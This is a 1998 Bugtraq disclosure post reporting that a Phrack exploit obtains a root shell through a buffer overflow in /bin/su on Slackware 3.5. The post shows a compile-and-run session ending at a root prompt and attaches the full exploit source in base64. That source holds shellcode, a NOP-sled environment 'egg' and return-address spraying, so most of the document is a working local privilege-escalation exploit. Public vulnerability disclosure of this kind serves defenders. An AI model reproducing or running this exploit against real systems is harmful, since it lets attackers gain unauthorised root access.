slackware-3.5 /bin/su buffer overflow
Date: Tue, 18 Aug 1998 17:42:02 +0700
From: Chatchai Watchakit <s8013006@KMITL.AC.TH>
To: BUGTRAQ@netspace.org
Subject: slackware-3.5 /bin/su buffer overflow
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---559023410-851401618-903436922=:3045
Content-Type: TEXT/PLAIN; charset=US-ASCII
>From exploit4.c of Phrack 49 (P49-14) can exploit /bin/su of slackware-3.5
kernel 2.0.34
---------------------
endeavor:~$ gcc -o exploit4 exploit4.c
endeavor:~$ ./exploit4
Using address: 0xbffffb20
bash$ /bin/su $RET
bash#
---------------------
Chatchai W.
---559023410-851401618-903436922=:3045
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="exploit4.c"
Content-ID: <Pine.GSO.4.02A.9808181742020.3045@Chaokhun.kmitl.ac.th>
Content-Description: exploit4.c
Content-Disposition: attachment; filename="exploit4.c"
Content-Transfer-Encoding: BASE64
I2luY2x1ZGUgPHN0ZGxpYi5oPg0KDQojZGVmaW5lIERFRkFVTFRfT0ZGU0VU
ICAgICAgICAgICAgICAgICAgICAwDQojZGVmaW5lIERFRkFVTFRfQlVGRkVS
X1NJWkUgICAgICAgICAgICAgNTEyDQojZGVmaW5lIERFRkFVTFRfRUdHX1NJ
WkUgICAgICAgICAgICAgICAyMDQ4DQojZGVmaW5lIE5PUCAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAweDkwDQoNCmNoYXIgc2hlbGxjb2RlW10gPQ0K
ICAiXHhlYlx4MWZceDVlXHg4OVx4NzZceDA4XHgzMVx4YzBceDg4XHg0Nlx4
MDdceDg5XHg0Nlx4MGNceGIwXHgwYiINCiAgIlx4ODlceGYzXHg4ZFx4NGVc
eDA4XHg4ZFx4NTZceDBjXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4XHg0MFx4
Y2QiDQogICJceDgwXHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0K
dW5zaWduZWQgbG9uZyBnZXRfZXNwKHZvaWQpIHsNCiAgIF9fYXNtX18oIm1v
dmwgJWVzcCwlZWF4Iik7DQp9DQoNCnZvaWQgbWFpbihpbnQgYXJnYywgY2hh
ciAqYXJndltdKSB7DQogIGNoYXIgKmJ1ZmYsICpwdHIsICplZ2c7DQogIGxv
bmcgKmFkZHJfcHRyLCBhZGRyOw0KICBpbnQgb2Zmc2V0PURFRkFVTFRfT0ZG
U0VULCBic2l6ZT1ERUZBVUxUX0JVRkZFUl9TSVpFOw0KICBpbnQgaSwgZWdn
c2l6ZT1ERUZBVUxUX0VHR19TSVpFOw0KDQogIGlmIChhcmdjID4gMSkgYnNp
emUgICA9IGF0b2koYXJndlsxXSk7DQogIGlmIChhcmdjID4gMikgb2Zmc2V0
ICA9IGF0b2koYXJndlsyXSk7DQogIGlmIChhcmdjID4gMykgZWdnc2l6ZSA9
IGF0b2koYXJndlszXSk7DQoNCg0KICBpZiAoIShidWZmID0gbWFsbG9jKGJz
aXplKSkpIHsNCiAgICBwcmludGYoIkNhbid0IGFsbG9jYXRlIG1lbW9yeS5c
biIpOw0KICAgIGV4aXQoMCk7DQogIH0NCiAgaWYgKCEoZWdnID0gbWFsbG9j
KGVnZ3NpemUpKSkgew0KICAgIHByaW50ZigiQ2FuJ3QgYWxsb2NhdGUgbWVt
b3J5LlxuIik7DQogICAgZXhpdCgwKTsNCiAgfQ0KDQogIGFkZHIgPSBnZXRf
ZXNwKCkgLSBvZmZzZXQ7DQogIHByaW50ZigiVXNpbmcgYWRkcmVzczogMHgl
eFxuIiwgYWRkcik7DQoNCiAgcHRyID0gYnVmZjsNCiAgYWRkcl9wdHIgPSAo
bG9uZyAqKSBwdHI7DQogIGZvciAoaSA9IDA7IGkgPCBic2l6ZTsgaSs9NCkN
CiAgICAqKGFkZHJfcHRyKyspID0gYWRkcjsNCg0KICBwdHIgPSBlZ2c7DQog
IGZvciAoaSA9IDA7IGkgPCBlZ2dzaXplIC0gc3RybGVuKHNoZWxsY29kZSkg
LSAxOyBpKyspDQogICAgKihwdHIrKykgPSBOT1A7DQoNCiAgZm9yIChpID0g
MDsgaSA8IHN0cmxlbihzaGVsbGNvZGUpOyBpKyspDQogICAgKihwdHIrKykg
PSBzaGVsbGNvZGVbaV07DQoNCiAgYnVmZltic2l6ZSAtIDFdID0gJ1wwJzsN
CiAgZWdnW2VnZ3NpemUgLSAxXSA9ICdcMCc7DQoNCiAgbWVtY3B5KGVnZywi
RUdHPSIsNCk7DQogIHB1dGVudihlZ2cpOw0KICBtZW1jcHkoYnVmZiwiUkVU
PSIsNCk7DQogIHB1dGVudihidWZmKTsNCiAgc3lzdGVtKCIvYmluL2Jhc2gi
KTsNCn0NCg==
---559023410-851401618-903436922=:3045--
